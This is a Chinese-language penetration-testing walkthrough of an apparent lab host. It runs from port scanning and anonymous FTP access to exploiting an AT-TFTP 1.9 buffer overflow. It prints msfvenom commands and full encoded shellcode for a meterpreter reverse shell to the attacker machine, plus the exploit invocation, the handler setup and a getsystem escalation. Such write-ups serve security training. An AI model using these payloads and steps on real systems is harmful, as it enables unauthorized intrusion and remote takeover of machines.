0x00 前言

今天这篇文章主要来分享一个在渗透测试过程中如何通过逐步收集信息并最终拿下目标主机的案例。

0x01 案例分析

实验环境：

目标靶机：10.11.1.0/24

攻击机：Kali Linux（10.11.0.74）

渗透过程：

首先进行服务和端口扫描，如下：

# nmap -sT -Pn 10.11.1.226Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:35 CSTNmap scan report for 10.11.1.226Host is up (0.14s latency).Not shown: 998 filtered portsPORT     STATE  SERVICE21/tcp   open   ftp3389/tcp closed ms-wbt-serverNmap done: 1 IP address (1 host up) scanned in 35.58 seconds

可见，目标主机开启了ftp和RDP服务。简单测试一下发现，ftp可以匿名登录。

# ftp 10.11.1.226Connected to 10.11.1.226.220-exploitme220 Please enter your name:Name (10.11.1.226:root): anonymous331 User name okay, Need password.Password:230 User logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for /bin/ls (468 bytes).-rwxrw-rw- 1 root  root        0 Dec 24  2009 AUTOEXEC.BAT-rwxrw-rw- 1 root  root        0 Dec 24  2009 CONFIG.SYSdrwxrw-rw- 1 root  root        0 Sep 19  2011 Documents and Settingsdrwxrw-rw- 1 root  root        0 Dec 24  2009 ftprootdrwxrw-rw- 1 root  root        0 Dec 27  2012 Program Filesdrwxrw-rw- 1 root  root        0 Jun 16  2016 Python26drwxrw-rw- 1 root  root        0 Apr 20  2016 WINDOWSdrwxrw-rw- 1 root  root        0 Dec 24  2009 wmpub226 Transfer successful.ftp> cd "Documents and Settings"250 "/Documents and Settings" is current directory.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for /bin/ls (108 bytes).drwxrw-rw- 1 root  root        0 Dec 24  2009 All Usersdrwxrw-rw- 1 root  root        0 Aug 18  2015 joe226 Transfer successful.ftp> cd joe250 "/Documents and Settings/joe" is current directory.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for /bin/ls (401 bytes).drwxrw-rw- 1 root  root        0 Aug 18  2015 .idlercdrwxrw-rw- 1 root  root        0 Dec 24  2009 Cookiesdrwxrw-rw- 1 root  root        0 Aug 18  2015 Desktopdrwxrw-rw- 1 root  root        0 Sep 19  2011 Favoritesdrwxrw-rw- 1 root  root        0 Sep 19  2011 My Documentsdrwxrw-rw- 1 root  root        0 Dec 23  2009 Start Menu-rwxrw-rw- 1 root  root        0 Dec 23  2009 Sti_Trace.log226 Transfer successful.ftp> cd Desktop250 "/Documents and Settings/joe/Desktop" is current directory.ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for /bin/ls (130 bytes).-rwxrw-rw- 1 root  root      694 Dec 24  2009 GuildFTPd FTP Deamon.lnk-rwxrw-rw- 1 root  root     2417 Dec  8  2015 servers.py226 Transfer successful.ftp> cat servers.py ?Invalid commandftp> type servers.py servers.py: unknown modeftp> get servers.py local: servers.py remote: servers.py200 PORT command successful.150 Opening binary mode data connection for /Documents and Settings/joe/Desktop/servers.py (2417 bytes).226 Transfer complete. 2417 bytes in 1 sec. (2.42 Kb/s).2417 bytes received in 0.01 secs (413.8064 kB/s)ftp>

在ftp的目录里发现了一个有趣的文件“servers.py”，因此下载并查看此文件。

# cat servers.py import wmi, time, ftplib, tftpyprint "[*] Start"print ""def isFTPworking():    print "[*] Checking FTP connection..."    try:        ftp = ftplib.FTP('10.11.1.226', timeout=5)        ftp.login()    except:        print "[!] FTP not working!!"        return False    print "[*] FTP is working."    return Truedef isTFTPworking():    print "[*] Checking TFTP connection..."    try:        tftp = tftpy.TftpClient('10.11.1.226', 69)        tftp.download("C:/windows/temp/test.txt","C:/windows/temp/test2.txt")    except:        print "[!] TFTP not working!!"        return False    print "[*] TFTP is working."    return Truedef killProcess(processname):    print "[*] Killing process: " + processname    try:        c = wmi.WMI()        for process in c.Win32_Process():            if process.Name == processname:                process.Terminate()    except:        print "[!] Exception while killing process"    return Truedef startProcess(processpath):    print "[*] Creating process: " + processpath    try:        c = wmi.WMI()        pid, result = c.Win32_Process.Create(processpath)    except IOError:        print "[*] Exception while creating process " + processpath    returndef isProcessAlive(processname):    print "[*] Checking process: " + processname    check = False    try:        c = wmi.WMI()        for process in c.Win32_Process():            if process.Name == processname:                check = True        if not check:            return False    except:        print "[!] Exception while using wmi interface"    return Trueif __name__ == '__main__':    ftpproc   = 'GuildFTPd.exe'    tftpproc  = 'tftpd.exe'    processes = {'GuildFTPd.exe': r'"C:\\Program Files\\GuildFTPd\\GuildFTPd.exe"',                 'tftpd.exe': r'"C:\\Program Files\\Allied Telesyn\\AT-TFTP Server 1.9\\tftpd.exe"'}    while True:        for processname in processes.keys():            if not isProcessAlive(processname):                startProcess(processes[processname])        if not isFTPworking():            killProcess(ftpproc)            time.sleep(5)            startProcess(processes[ftpproc])        if not isTFTPworking():            killProcess(tftpproc)            time.sleep(5)            startProcess(processes[tftpproc])        time.sleep(30)

很显然，这是一个用来启动ftp和tftp服务的python脚本。回想起前面我们的扫描结果显示目标主机确实开启了ftp服务，于是猜想可能就是和该脚本有关。从上面的代码可以判断，目标主机安装了AT-TFTP server 1.9。扫描TFTP的端口69（UDP）发现确实是开放的。

# nmap -sU -Pn -p 69 10.11.1.226Starting Nmap 7.50 ( https://nmap.org ) at 2017-09-10 03:44 CSTNmap scan report for 10.11.1.226Host is up (0.12s latency).PORT   STATE SERVICE69/udp open  tftpMAC Address: 00:50:56:89:7B:69 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds

Google搜索发现AT-TFTP 1.9存在一个缓冲区溢出的RCE漏洞：<;

于是，利用下面的步骤生成meterpreter的反弹shell的shellcode，并替换利用脚本atftp.py中相应的shellcode代码：

# perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj# msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=10.11.0.74 LPORT=4444 R > payloadNo platform was selected, choosing Msf::Module::Platform::Windows from the payloadNo Arch selected, selecting Arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 177 bytes# cat stackadj payload > shellcode# cat shellcode | msfvenom -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f pythonAttempting to read payload from STDIN...Found 1 compatible encodersAttempting to encode payload with 1 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 210 (iteration=0)x86/shikata_ga_nai chosen with final size 210Payload size: 210 bytesFinal size of python file: 1020 bytesbuf =  ""buf += "\xdd\xc1\xd9\x74\x24\xf4\x58\x33\xc9\xb1\x2e\xbf\x13"buf += "\x73\xb1\x20\x31\x78\x1a\x03\x78\x1a\x83\xe8\xfc\xe2"buf += "\xe6\xf2\x5d\x8c\x05\xf5\x9d\x31\x7f\x1e\xda\x21\x86"buf += "\x1f\x1a\x4e\x18\xd1\x3e\x3a\xa5\x2d\x4a\x41\x68\x36"buf += "\x4d\x55\x19\x91\x6d\xa8\xf7\x95\x5a\x30\x06\x44\x93"buf += "\x84\x91\x34\x15\xce\xac\x45\x54\x4b\x6e\x30\xae\x17"buf += "\x08\x82\x84\xed\x37\xbf\x93\x41\x93\x41\x4d\x3b\x50"buf += "\x5d\xd4\x4f\x29\x42\xe7\xa6\xb6\x56\x7e\xb1\xd4\x82"buf += "\x9c\xa3\xdb\x2b\xad\xf8\x47\x27\x8d\xce\x0c\x77\x1e"buf += "\xa4\x62\x64\xb3\x31\xea\x9c\x95\x23\xb9\xfa\x41\x9f"buf += "\x0f\x6b\xe5\xac\x5d\x34\x5d\x35\x18\xb8\x3d\x46\x8c"buf += "\xa8\xed\xeb\x63\x80\x52\x5f\xc0\x75\xdc\xb8\xa0\xf8"buf += "\x31\x4e\x2e\xac\x9e\x29\x97\xb5\xfe\x49\x31\x5f\xb8"buf += "\x1e\xd2\x5f\x6c\xc9\x44\xaa\x9a\xf6\xde\xcc\xf4\xe7"buf += "\x82\x76\x56\x81\xd9\x1d\x48\xc2\x4a\x84\xd1\xb3\x71"buf += "\xb7\xf4\x6c\xcd\x4b\xa9\xdf\x7a\x07\x2f\x59\x44\x9f"buf += "\x50\x7f"

开启MSF的监听，并执行利用脚本。

# python atftp.py 10.11.1.226 69 10.11.0.74 9

接着，我们成功地获得了一个meterpreter的反弹shell，如下：

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_nonx_tcppayload => windows/meterpreter/reverse_nonx_tcpmsf exploit(handler) > set LHOST 10.11.0.74LHOST => 10.11.0.74msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 10.11.0.74:4444 msf exploit(handler) > [*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (171583 bytes) to 10.11.1.226[*] Meterpreter session 1 opened (10.11.0.74:4444 -> 10.11.1.226:1144) at 2017-09-10 03:57:12 +0800[+] negotiating tlv encryption[+] negotiated tlv encryption[+] negotiated tlv encryptionmsf exploit(handler) > sessions Active sessions===============  Id  Type                     Information    Connection  --  ----                     -----------    ----------  1   meterpreter x86/windows  JOE\joe @ JOE  10.11.0.74:4444 -> 10.11.1.226:1144 (10.11.1.226)

迁移当前的meterpreter(PID 3716)至一个稳定的进程vmtoolsd.exe(PID 1776), 然后执行getsystem命令进行提权。最终，我们成功地获得了一个SYSTEM权限的meterpreter反弹shell。

0x02 小结

总结一下该案例的渗透思路如下：

首先进行服务和端口扫描

接着检测到ftp可匿名登录并进一步发现有价值的脚本文件

猜测并验证目标系统开启了有漏洞的tftp服务

修改漏洞利用代码并尝试利用

最终获得反弹shell并成功提权

你可能感兴趣的文章